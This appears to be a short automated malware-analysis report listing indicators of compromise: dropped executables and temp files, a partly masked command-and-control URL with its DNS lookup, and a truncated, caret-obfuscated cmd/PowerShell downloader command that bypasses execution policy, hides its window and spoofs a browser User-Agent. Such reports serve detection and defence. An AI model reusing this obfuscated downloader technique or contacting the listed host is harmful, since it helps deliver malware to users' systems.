Technical Information
- '%LOCALAPPDATA%\temptsd92.exe'
- <SYSTEM32>\wermgr.exe
- %LOCALAPPDATA%\temptsd92.exe
- %TEMP%\log5cb8.tmp
- %TEMP%\log5cb8.tmp
- http://ra##land.in/rare/rarleworld.php
- DNS ASK ra##land.in
- '<SYSTEM32>\cmd.exe' /c mgiHxlIuXGLMwja & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c mgiHxlIuXGLMwja & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....
- '<SYSTEM32>\wermgr.exe'